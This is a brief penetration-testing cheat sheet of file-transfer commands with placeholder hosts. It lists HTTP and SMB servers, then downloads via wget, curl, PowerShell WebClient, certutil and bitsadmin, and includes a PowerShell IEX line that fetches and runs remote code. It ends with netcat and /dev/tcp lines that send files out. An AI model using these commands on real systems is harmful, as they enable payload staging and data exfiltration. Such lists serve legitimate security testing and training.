python -m http.server <port> -d <path>
sudo systemctl start apache2
smbserver.py -smb2support <share-name> <local-folder>
wget <ip>:<port>/file.txt
curl -O http://host/file.txt
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://www.xyz.net/file.txt', 'C:\tmp\file.txt')"
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<host>/<file>')"
certutil.exe -urlcache -split -f http://<host>/<file> <file>
bitsadmin /transfer mydownloadjob /download /priority normal <url> <destination>
nc -nv <own-ip> <port> < file
Note: There is no feedback about the progress, or when/if the upload finished.
cat <file> > /dev/tcp/<ip>/<port>